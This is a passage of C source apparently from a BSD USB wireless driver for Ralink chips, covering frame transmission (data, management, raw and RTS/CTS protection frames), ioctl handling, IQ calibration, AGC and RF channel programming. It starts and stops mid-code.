*/ if(IEEE80211_HAS_ADDR4(wh) == IEEE80211_QOS_HAS_SEQ(wh)) pad = 0; else pad = 2; /* setup TX Wireless Information */ txwi = (struct rt2860_txwi *)(txd + 1); txwi->len = htole16(m->m_pkthdr.len - pad); if (rt2860_rates[ridx].phy == IEEE80211_T_DS) { txwi->phy = htole16(RT2860_PHY_CCK); if (ridx != RT2860_RIDX_CCK1 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) mcs |= RT2860_PHY_SHPRE; } else txwi->phy = htole16(RT2860_PHY_OFDM); txwi->phy |= htole16(mcs); /* check if RTS/CTS or CTS-to-self protection is required */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && (m->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold || ((ic->ic_flags & IEEE80211_F_USEPROT) && rt2860_rates[ridx].phy == IEEE80211_T_OFDM))) txwi->txop |= RT2860_TX_TXOP_HT; else txwi->txop |= RT2860_TX_TXOP_BACKOFF; if (vap->iv_opmode != IEEE80211_M_STA && !IEEE80211_QOS_HAS_SEQ(wh)) txwi->xflags |= RT2860_TX_NSEQ; } /* This function must be called locked */ static int run_tx(struct run_softc *sc, struct mbuf *m, struct ieee80211_node *ni) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_frame *wh; struct ieee80211_channel *chan; const struct ieee80211_txparam *tp; struct run_node *rn = (void *)ni; struct run_tx_data *data; struct rt2870_txd *txd; struct rt2860_txwi *txwi; uint16_t qos; uint16_t dur; uint16_t qid; uint8_t type; uint8_t tid; uint8_t ridx; uint8_t ctl_ridx; uint8_t qflags; uint8_t xflags = 0; int hasqos; RUN_LOCK_ASSERT(sc, MA_OWNED); wh = mtod(m, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; /* * There are 7 bulk endpoints: 1 for RX * and 6 for TX (4 EDCAs + HCCA + Prio). * Update 03-14-2009: some devices like the Planex GW-US300MiniS * seem to have only 4 TX bulk endpoints (Fukaumi Naoki). */ if ((hasqos = IEEE80211_QOS_HAS_SEQ(wh))) { uint8_t *frm; if(IEEE80211_HAS_ADDR4(wh)) frm = ((struct ieee80211_qosframe_addr4 *)wh)->i_qos; else frm =((struct ieee80211_qosframe *)wh)->i_qos; qos = le16toh(*(const uint16_t *)frm); tid = qos & IEEE80211_QOS_TID; qid = TID_TO_WME_AC(tid); } else { qos = 0; tid = 0; qid = WME_AC_BE; } qflags = (qid < 4) ? RT2860_TX_QSEL_EDCA : RT2860_TX_QSEL_HCCA; DPRINTFN(8, "qos %d\tqid %d\ttid %d\tqflags %x\n", qos, qid, tid, qflags); chan = (ni->ni_chan != IEEE80211_CHAN_ANYC)?ni->ni_chan:ic->ic_curchan; tp = &vap->iv_txparms[ieee80211_chan2mode(chan)]; /* pickup a rate index */ if (IEEE80211_IS_MULTICAST(wh->i_addr1) || type != IEEE80211_FC0_TYPE_DATA) { ridx = (ic->ic_curmode == IEEE80211_MODE_11A) ? 
RT2860_RIDX_OFDM6 : RT2860_RIDX_CCK1; ctl_ridx = rt2860_rates[ridx].ctl_ridx; } else { if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) ridx = rn->fix_ridx; else ridx = rn->amrr_ridx; ctl_ridx = rt2860_rates[ridx].ctl_ridx; } if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && (!hasqos || (qos & IEEE80211_QOS_ACKPOLICY) != IEEE80211_QOS_ACKPOLICY_NOACK)) { xflags |= RT2860_TX_ACK; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) dur = rt2860_rates[ctl_ridx].sp_ack_dur; else dur = rt2860_rates[ctl_ridx].lp_ack_dur; USETW(wh->i_dur, dur); } /* reserve slots for mgmt packets, just in case */ if (sc->sc_epq[qid].tx_nfree < 3) { DPRINTFN(10, "tx ring %d is full\n", qid); return (-1); } data = STAILQ_FIRST(&sc->sc_epq[qid].tx_fh); STAILQ_REMOVE_HEAD(&sc->sc_epq[qid].tx_fh, next); sc->sc_epq[qid].tx_nfree--; txd = (struct rt2870_txd *)&data->desc; txd->flags = qflags; txwi = (struct rt2860_txwi *)(txd + 1); txwi->xflags = xflags; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) txwi->wcid = 0; else txwi->wcid = (vap->iv_opmode == IEEE80211_M_STA) ? 1 : RUN_AID2WCID(ni->ni_associd); /* clear leftover garbage bits */ txwi->flags = 0; txwi->txop = 0; data->m = m; data->ni = ni; data->ridx = ridx; run_set_tx_desc(sc, data); /* * The chip keeps track of 2 kinds of Tx stats: * * TX_STAT_FIFO, for per-WCID stats, and * * TX_STA_CNT0 for all-TX-in-one stats. * * To use FIFO stats, we need to store the MCS into the driver-private * PacketID field, so that we can tell whose stats they are when we read them. * We add 1 to the MCS because setting the PacketID field to 0 means * that we don't want feedback in TX_STAT_FIFO. * And that's what we want for STA mode, since TX_STA_CNT0 does the job. * * FIFO stats don't count Tx with WCID 0xff, so we do this in run_tx(). */ if (sc->rvp_cnt > 1 || vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS) { uint16_t pid = (rt2860_rates[ridx].mcs + 1) & 0xf; txwi->len |= htole16(pid << RT2860_TX_PID_SHIFT); /* * Unlike PCI based devices, we don't get any interrupt from * USB devices, so we simulate a FIFO-is-full interrupt here. * Ralink recommends draining the FIFO stats every 100 ms, but the 16 slots * fill up quickly. To prevent overflow, increment a counter on * every FIFO stat request, so we know how many slots are left. * We do this only in HOSTAP or multiple-vap mode since FIFO stats * are used only in those modes. * We just drain the stats here; AMRR gets updated every 1 sec by * run_ratectl_cb() via callout. * Drain early, otherwise the FIFO overflows. */ if (sc->fifo_cnt++ == 10) { /* * With multiple vaps or if_bridge, if_start() can be called * with a non-sleepable lock held (tcpinp), so we need to defer.
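* (As with the key updates above, the drain is pushed onto sc->cmdq and run from the cmdq task, where the synchronous USB register reads are allowed to sleep.)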
*/ uint32_t i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTFN(6, "cmdq_store=%d\n", i); sc->cmdq[i].func = run_drain_fifo; sc->cmdq[i].arg0 = sc; ieee80211_runtask(ic, &sc->cmdq_task); } } STAILQ_INSERT_TAIL(&sc->sc_epq[qid].tx_qh, data, next); usbd_transfer_start(sc->sc_xfer[qid]); DPRINTFN(8, "sending data frame len=%d rate=%d qid=%d\n", m->m_pkthdr.len + (int)(sizeof(struct rt2870_txd) + sizeof(struct rt2860_txwi)), rt2860_rates[ridx].rate, qid); return (0); } static int run_tx_mgt(struct run_softc *sc, struct mbuf *m, struct ieee80211_node *ni) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct run_node *rn = (void *)ni; struct run_tx_data *data; struct ieee80211_frame *wh; struct rt2870_txd *txd; struct rt2860_txwi *txwi; uint16_t dur; uint8_t ridx = rn->mgt_ridx; uint8_t type; uint8_t xflags = 0; uint8_t wflags = 0; RUN_LOCK_ASSERT(sc, MA_OWNED); wh = mtod(m, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; /* tell hardware to add timestamp for probe responses */ if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP)) wflags |= RT2860_TX_TS; else if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { xflags |= RT2860_TX_ACK; dur = ieee80211_ack_duration(ic->ic_rt, rt2860_rates[ridx].rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); USETW(wh->i_dur, dur); } if (sc->sc_epq[0].tx_nfree == 0) { /* let caller free mbuf */ ifp->if_drv_flags |= IFF_DRV_OACTIVE; return (EIO); } data = STAILQ_FIRST(&sc->sc_epq[0].tx_fh); STAILQ_REMOVE_HEAD(&sc->sc_epq[0].tx_fh, next); sc->sc_epq[0].tx_nfree--; txd = (struct rt2870_txd *)&data->desc; txd->flags = RT2860_TX_QSEL_EDCA; txwi = (struct rt2860_txwi *)(txd + 1); txwi->wcid = 0xff; txwi->flags = wflags; txwi->xflags = xflags; txwi->txop = 0; /* clear leftover garbage bits */ data->m = m; data->ni = ni; data->ridx = ridx; run_set_tx_desc(sc, data); DPRINTFN(10, "sending mgt frame len=%d rate=%d\n", m->m_pkthdr.len + (int)(sizeof(struct rt2870_txd) + sizeof(struct rt2860_txwi)), rt2860_rates[ridx].rate); STAILQ_INSERT_TAIL(&sc->sc_epq[0].tx_qh, data, next); usbd_transfer_start(sc->sc_xfer[0]); return (0); } static int run_sendprot(struct run_softc *sc, const struct mbuf *m, struct ieee80211_node *ni, int prot, int rate) { struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; struct run_tx_data *data; struct rt2870_txd *txd; struct rt2860_txwi *txwi; struct mbuf *mprot; int ridx; int protrate; int ackrate; int pktlen; int isshort; uint16_t dur; uint8_t type; uint8_t wflags = 0; uint8_t xflags = 0; RUN_LOCK_ASSERT(sc, MA_OWNED); KASSERT(prot == IEEE80211_PROT_RTSCTS || prot == IEEE80211_PROT_CTSONLY, ("protection %d", prot)); wh = mtod(m, struct ieee80211_frame *); pktlen = m->m_pkthdr.len + IEEE80211_CRC_LEN; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; protrate = ieee80211_ctl_rate(ic->ic_rt, rate); ackrate = ieee80211_ack_rate(ic->ic_rt, rate); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; dur = ieee80211_compute_duration(ic->ic_rt, pktlen, rate, isshort) + ieee80211_ack_duration(ic->ic_rt, rate, isshort); wflags = RT2860_TX_FRAG; /* check that there are free slots before allocating the mbuf */ if (sc->sc_epq[0].tx_nfree == 0) { /* let caller free mbuf */ sc->sc_ifp->if_drv_flags |= IFF_DRV_OACTIVE; return (ENOBUFS); } if (prot == IEEE80211_PROT_RTSCTS) { /* NB: CTS is the same size as an ACK */ dur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); xflags |= RT2860_TX_ACK; mprot = ieee80211_alloc_rts(ic, 
wh->i_addr1, wh->i_addr2, dur); } else { mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, dur); } if (mprot == NULL) { sc->sc_ifp->if_oerrors++; DPRINTF("could not allocate mbuf\n"); return (ENOBUFS); } data = STAILQ_FIRST(&sc->sc_epq[0].tx_fh); STAILQ_REMOVE_HEAD(&sc->sc_epq[0].tx_fh, next); sc->sc_epq[0].tx_nfree--; txd = (struct rt2870_txd *)&data->desc; txd->flags = RT2860_TX_QSEL_EDCA; txwi = (struct rt2860_txwi *)(txd + 1); txwi->wcid = 0xff; txwi->flags = wflags; txwi->xflags = xflags; txwi->txop = 0; /* clear leftover garbage bits */ data->m = mprot; data->ni = ieee80211_ref_node(ni); for (ridx = 0; ridx < RT2860_RIDX_MAX; ridx++) if (rt2860_rates[ridx].rate == protrate) break; data->ridx = ridx; run_set_tx_desc(sc, data); DPRINTFN(1, "sending prot len=%u rate=%u\n", m->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->sc_epq[0].tx_qh, data, next); usbd_transfer_start(sc->sc_xfer[0]); return (0); } static int run_tx_param(struct run_softc *sc, struct mbuf *m, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; struct run_tx_data *data; struct rt2870_txd *txd; struct rt2860_txwi *txwi; uint8_t type; uint8_t ridx; uint8_t rate; uint8_t opflags = 0; uint8_t xflags = 0; int error; RUN_LOCK_ASSERT(sc, MA_OWNED); KASSERT(params != NULL, ("no raw xmit params")); wh = mtod(m, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; rate = params->ibp_rate0; if (!ieee80211_isratevalid(ic->ic_rt, rate)) { /* let caller free mbuf */ return (EINVAL); } if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) xflags |= RT2860_TX_ACK; if (params->ibp_flags & (IEEE80211_BPF_RTS|IEEE80211_BPF_CTS)) { error = run_sendprot(sc, m, ni, params->ibp_flags & IEEE80211_BPF_RTS ? 
IEEE80211_PROT_RTSCTS : IEEE80211_PROT_CTSONLY, rate); if (error) { /* let caller free mbuf */ return error; } opflags |= /*XXX RT2573_TX_LONG_RETRY |*/ RT2860_TX_TXOP_SIFS; } if (sc->sc_epq[0].tx_nfree == 0) { /* let caller free mbuf */ sc->sc_ifp->if_drv_flags |= IFF_DRV_OACTIVE; DPRINTF("sending raw frame, but tx ring is full\n"); return (EIO); } data = STAILQ_FIRST(&sc->sc_epq[0].tx_fh); STAILQ_REMOVE_HEAD(&sc->sc_epq[0].tx_fh, next); sc->sc_epq[0].tx_nfree--; txd = (struct rt2870_txd *)&data->desc; txd->flags = RT2860_TX_QSEL_EDCA; txwi = (struct rt2860_txwi *)(txd + 1); txwi->wcid = 0xff; txwi->xflags = xflags; txwi->txop = opflags; txwi->flags = 0; /* clear leftover garbage bits */ data->m = m; data->ni = ni; for (ridx = 0; ridx < RT2860_RIDX_MAX; ridx++) if (rt2860_rates[ridx].rate == rate) break; data->ridx = ridx; run_set_tx_desc(sc, data); DPRINTFN(10, "sending raw frame len=%u rate=%u\n", m->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->sc_epq[0].tx_qh, data, next); usbd_transfer_start(sc->sc_xfer[0]); return (0); } static int run_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = ni->ni_ic->ic_ifp; struct run_softc *sc = ifp->if_softc; int error = 0; RUN_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { error = ENETDOWN; goto done; } if (params == NULL) { /* tx mgt packet */ if ((error = run_tx_mgt(sc, m, ni)) != 0) { ifp->if_oerrors++; DPRINTF("mgt tx failed\n"); goto done; } } else { /* tx raw packet with param */ if ((error = run_tx_param(sc, m, ni, params)) != 0) { ifp->if_oerrors++; DPRINTF("tx with param failed\n"); goto done; } } ifp->if_opackets++; done: RUN_UNLOCK(sc); if (error != 0) { if(m != NULL) m_freem(m); ieee80211_free_node(ni); } return (error); } static void run_start(struct ifnet *ifp) { struct run_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; RUN_LOCK(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { RUN_UNLOCK(sc); return; } for (;;) { /* send data frames */ IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; if (run_tx(sc, m, ni) != 0) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } } RUN_UNLOCK(sc); } static int run_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct run_softc *sc = ifp->if_softc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int startall = 0; int error; RUN_LOCK(sc); error = sc->sc_detached ? ENXIO : 0; RUN_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: RUN_LOCK(sc); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)){ startall = 1; run_init_locked(sc); } else run_update_promisc_locked(ifp); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING && (ic->ic_nrunning == 0 || sc->rvp_cnt <= 1)) { run_stop(sc); } } RUN_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static void run_iq_calib(struct run_softc *sc, u_int chan) { uint16_t val; /* Tx0 IQ gain. 
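* (Throughout run_iq_calib(), BBP register 158 effectively acts as an index register and BBP 159 as its data register: each write pair below selects one IQ calibration parameter and loads the value read from eFUSE.)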
*/ run_bbp_write(sc, 158, 0x2c); if (chan <= 14) run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX0_2GHZ, &val, 1); else if (chan <= 64) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX0_CH36_TO_CH64_5GHZ, &val, 1); } else if (chan <= 138) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX0_CH100_TO_CH138_5GHZ, &val, 1); } else if (chan <= 165) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX0_CH140_TO_CH165_5GHZ, &val, 1); } else val = 0; run_bbp_write(sc, 159, val); /* Tx0 IQ phase. */ run_bbp_write(sc, 158, 0x2d); if (chan <= 14) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX0_2GHZ, &val, 1); } else if (chan <= 64) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX0_CH36_TO_CH64_5GHZ, &val, 1); } else if (chan <= 138) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX0_CH100_TO_CH138_5GHZ, &val, 1); } else if (chan <= 165) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX0_CH140_TO_CH165_5GHZ, &val, 1); } else val = 0; run_bbp_write(sc, 159, val); /* Tx1 IQ gain. */ run_bbp_write(sc, 158, 0x4a); if (chan <= 14) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX1_2GHZ, &val, 1); } else if (chan <= 64) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX1_CH36_TO_CH64_5GHZ, &val, 1); } else if (chan <= 138) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX1_CH100_TO_CH138_5GHZ, &val, 1); } else if (chan <= 165) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX1_CH140_TO_CH165_5GHZ, &val, 1); } else val = 0; run_bbp_write(sc, 159, val); /* Tx1 IQ phase. */ run_bbp_write(sc, 158, 0x4b); if (chan <= 14) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX1_2GHZ, &val, 1); } else if (chan <= 64) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX1_CH36_TO_CH64_5GHZ, &val, 1); } else if (chan <= 138) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX1_CH100_TO_CH138_5GHZ, &val, 1); } else if (chan <= 165) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX1_CH140_TO_CH165_5GHZ, &val, 1); } else val = 0; run_bbp_write(sc, 159, val); /* RF IQ compensation control. */ run_bbp_write(sc, 158, 0x04); run_efuse_read(sc, RT5390_EEPROM_RF_IQ_COMPENSATION_CTL, &val, 1); run_bbp_write(sc, 159, val); /* RF IQ imbalance compensation control. */ run_bbp_write(sc, 158, 0x03); run_efuse_read(sc, RT5390_EEPROM_RF_IQ_IMBALANCE_COMPENSATION_CTL, &val, 1); run_bbp_write(sc, 159, val); } static void run_set_agc(struct run_softc *sc, uint8_t agc) { uint8_t bbp; if (sc->mac_ver == 0x3572) { run_bbp_read(sc, 27, &bbp); bbp &= ~(0x3 << 5); run_bbp_write(sc, 27, bbp | 0 << 5); /* select Rx0 */ run_bbp_write(sc, 66, agc); run_bbp_write(sc, 27, bbp | 1 << 5); /* select Rx1 */ run_bbp_write(sc, 66, agc); } else run_bbp_write(sc, 66, agc); } static void run_select_chan_group(struct run_softc *sc, int group) { uint32_t tmp; uint8_t agc; run_bbp_write(sc, 62, 0x37 - sc->lna[group]); run_bbp_write(sc, 63, 0x37 - sc->lna[group]); run_bbp_write(sc, 64, 0x37 - sc->lna[group]); if (sc->mac_ver < 0x3572) run_bbp_write(sc, 86, 0x00); if (sc->mac_ver == 0x3593) { run_bbp_write(sc, 77, 0x98); run_bbp_write(sc, 83, (group == 0) ? 
0x8a : 0x9a); } if (group == 0) { if (sc->ext_2ghz_lna) { if (sc->mac_ver >= 0x5390) run_bbp_write(sc, 75, 0x52); else { run_bbp_write(sc, 82, 0x62); run_bbp_write(sc, 75, 0x46); } } else { if (sc->mac_ver == 0x5592) { run_bbp_write(sc, 79, 0x1c); run_bbp_write(sc, 80, 0x0e); run_bbp_write(sc, 81, 0x3a); run_bbp_write(sc, 82, 0x62); run_bbp_write(sc, 195, 0x80); run_bbp_write(sc, 196, 0xe0); run_bbp_write(sc, 195, 0x81); run_bbp_write(sc, 196, 0x1f); run_bbp_write(sc, 195, 0x82); run_bbp_write(sc, 196, 0x38); run_bbp_write(sc, 195, 0x83); run_bbp_write(sc, 196, 0x32); run_bbp_write(sc, 195, 0x85); run_bbp_write(sc, 196, 0x28); run_bbp_write(sc, 195, 0x86); run_bbp_write(sc, 196, 0x19); } else if (sc->mac_ver >= 0x5390) run_bbp_write(sc, 75, 0x50); else { run_bbp_write(sc, 82, (sc->mac_ver == 0x3593) ? 0x62 : 0x84); run_bbp_write(sc, 75, 0x50); } } } else { if (sc->mac_ver == 0x5592) { run_bbp_write(sc, 79, 0x18); run_bbp_write(sc, 80, 0x08); run_bbp_write(sc, 81, 0x38); run_bbp_write(sc, 82, 0x92); run_bbp_write(sc, 195, 0x80); run_bbp_write(sc, 196, 0xf0); run_bbp_write(sc, 195, 0x81); run_bbp_write(sc, 196, 0x1e); run_bbp_write(sc, 195, 0x82); run_bbp_write(sc, 196, 0x28); run_bbp_write(sc, 195, 0x83); run_bbp_write(sc, 196, 0x20); run_bbp_write(sc, 195, 0x85); run_bbp_write(sc, 196, 0x7f); run_bbp_write(sc, 195, 0x86); run_bbp_write(sc, 196, 0x7f); } else if (sc->mac_ver == 0x3572) run_bbp_write(sc, 82, 0x94); else run_bbp_write(sc, 82, (sc->mac_ver == 0x3593) ? 0x82 : 0xf2); if (sc->ext_5ghz_lna) run_bbp_write(sc, 75, 0x46); else run_bbp_write(sc, 75, 0x50); } run_read(sc, RT2860_TX_BAND_CFG, &tmp); tmp &= ~(RT2860_5G_BAND_SEL_N | RT2860_5G_BAND_SEL_P); tmp |= (group == 0) ? RT2860_5G_BAND_SEL_N : RT2860_5G_BAND_SEL_P; run_write(sc, RT2860_TX_BAND_CFG, tmp); /* enable appropriate Power Amplifiers and Low Noise Amplifiers */ tmp = RT2860_RFTR_EN | RT2860_TRSW_EN | RT2860_LNA_PE0_EN; if (sc->mac_ver == 0x3593) tmp |= 1 << 29 | 1 << 28; if (sc->nrxchains > 1) tmp |= RT2860_LNA_PE1_EN; if (group == 0) { /* 2GHz */ tmp |= RT2860_PA_PE_G0_EN; if (sc->ntxchains > 1) tmp |= RT2860_PA_PE_G1_EN; if (sc->mac_ver == 0x3593) { if (sc->ntxchains > 2) tmp |= 1 << 25; } } else { /* 5GHz */ tmp |= RT2860_PA_PE_A0_EN; if (sc->ntxchains > 1) tmp |= RT2860_PA_PE_A1_EN; } if (sc->mac_ver == 0x3572) { run_rt3070_rf_write(sc, 8, 0x00); run_write(sc, RT2860_TX_PIN_CFG, tmp); run_rt3070_rf_write(sc, 8, 0x80); } else run_write(sc, RT2860_TX_PIN_CFG, tmp); if (sc->mac_ver == 0x5592) { run_bbp_write(sc, 195, 0x8d); run_bbp_write(sc, 196, 0x1a); } if (sc->mac_ver == 0x3593) { run_read(sc, RT2860_GPIO_CTRL, &tmp); tmp &= ~0x01010000; if (group == 0) tmp |= 0x00010000; tmp = (tmp & ~0x00009090) | 0x00000090; run_write(sc, RT2860_GPIO_CTRL, tmp); } /* set initial AGC value */ if (group == 0) { /* 2GHz band */ if (sc->mac_ver >= 0x3070) agc = 0x1c + sc->lna[0] * 2; else agc = 0x2e + sc->lna[0]; } else { /* 5GHz band */ if (sc->mac_ver == 0x5592) agc = 0x24 + sc->lna[group] * 2; else if (sc->mac_ver == 0x3572 || sc->mac_ver == 0x3593) agc = 0x22 + (sc->lna[group] * 5) / 3; else agc = 0x32 + (sc->lna[group] * 5) / 3; } run_set_agc(sc, agc); } static void run_rt2870_set_chan(struct run_softc *sc, u_int chan) { const struct rfprog *rfprog = rt2860_rf2850; uint32_t r2, r3, r4; int8_t txpow1, txpow2; int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rfprog[i].chan != chan; i++); r2 = rfprog[i].r2; if (sc->ntxchains == 1) r2 |= 1 << 14; /* 1T: disable Tx chain 2 */ if (sc->nrxchains == 1) r2 |= 
1 << 17 | 1 << 6; /* 1R: disable Rx chains 2 & 3 */ else if (sc->nrxchains == 2) r2 |= 1 << 6; /* 2R: disable Rx chain 3 */ /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; /* Initialize RF R3 and R4. */ r3 = rfprog[i].r3 & 0xffffc1ff; r4 = (rfprog[i].r4 & ~(0x001f87c0)) | (sc->freq << 15); if (chan > 14) { if (txpow1 >= 0) { txpow1 = (txpow1 > 0xf) ? (0xf) : (txpow1); r3 |= (txpow1 << 10) | (1 << 9); } else { txpow1 += 7; /* txpow1 is not possible larger than 15. */ r3 |= (txpow1 << 10); } if (txpow2 >= 0) { txpow2 = (txpow2 > 0xf) ? (0xf) : (txpow2); r4 |= (txpow2 << 7) | (1 << 6); } else { txpow2 += 7; r4 |= (txpow2 << 7); } } else { /* Set Tx0 power. */ r3 |= (txpow1 << 9); /* Set frequency offset and Tx1 power. */ r4 |= (txpow2 << 6); } run_rt2870_rf_write(sc, rfprog[i].r1); run_rt2870_rf_write(sc, r2); run_rt2870_rf_write(sc, r3 & ~(1 << 2)); run_rt2870_rf_write(sc, r4); run_delay(sc, 10); run_rt2870_rf_write(sc, rfprog[i].r1); run_rt2870_rf_write(sc, r2); run_rt2870_rf_write(sc, r3 | (1 << 2)); run_rt2870_rf_write(sc, r4); run_delay(sc, 10); run_rt2870_rf_write(sc, rfprog[i].r1); run_rt2870_rf_write(sc, r2); run_rt2870_rf_write(sc, r3 & ~(1 << 2)); run_rt2870_rf_write(sc, r4); } static void run_rt3070_set_chan(struct run_softc *sc, u_int chan) { int8_t txpow1, txpow2; uint8_t rf; int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; run_rt3070_rf_write(sc, 2, rt3070_freqs[i].n); /* RT3370/RT3390: RF R3 [7:4] is not reserved bits. */ run_rt3070_rf_read(sc, 3, &rf); rf = (rf & ~0x0f) | rt3070_freqs[i].k; run_rt3070_rf_write(sc, 3, rf); run_rt3070_rf_read(sc, 6, &rf); rf = (rf & ~0x03) | rt3070_freqs[i].r; run_rt3070_rf_write(sc, 6, rf); /* set Tx0 power */ run_rt3070_rf_read(sc, 12, &rf); rf = (rf & ~0x1f) | txpow1; run_rt3070_rf_write(sc, 12, rf); /* set Tx1 power */ run_rt3070_rf_read(sc, 13, &rf); rf = (rf & ~0x1f) | txpow2; run_rt3070_rf_write(sc, 13, rf); run_rt3070_rf_read(sc, 1, &rf); rf &= ~0xfc; if (sc->ntxchains == 1) rf |= 1 << 7 | 1 << 5; /* 1T: disable Tx chains 2 & 3 */ else if (sc->ntxchains == 2) rf |= 1 << 7; /* 2T: disable Tx chain 3 */ if (sc->nrxchains == 1) rf |= 1 << 6 | 1 << 4; /* 1R: disable Rx chains 2 & 3 */ else if (sc->nrxchains == 2) rf |= 1 << 6; /* 2R: disable Rx chain 3 */ run_rt3070_rf_write(sc, 1, rf); /* set RF offset */ run_rt3070_rf_read(sc, 23, &rf); rf = (rf & ~0x7f) | sc->freq; run_rt3070_rf_write(sc, 23, rf); /* program RF filter */ run_rt3070_rf_read(sc, 24, &rf); /* Tx */ rf = (rf & ~0x3f) | sc->rf24_20mhz; run_rt3070_rf_write(sc, 24, rf); run_rt3070_rf_read(sc, 31, &rf); /* Rx */ rf = (rf & ~0x3f) | sc->rf24_20mhz; run_rt3070_rf_write(sc, 31, rf); /* enable RF tuning */ run_rt3070_rf_read(sc, 7, &rf); run_rt3070_rf_write(sc, 7, rf | 0x01); } static void run_rt3572_set_chan(struct run_softc *sc, u_int chan) { int8_t txpow1, txpow2; uint32_t tmp; uint8_t rf; int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; if (chan <= 14) { run_bbp_write(sc, 25, sc->bbp25); run_bbp_write(sc, 26, sc->bbp26); } else { /* enable IQ phase correction */ run_bbp_write(sc, 25, 0x09); run_bbp_write(sc, 26, 0xff); } run_rt3070_rf_write(sc, 2, rt3070_freqs[i].n); run_rt3070_rf_write(sc, 3, rt3070_freqs[i].k); run_rt3070_rf_read(sc, 6, 
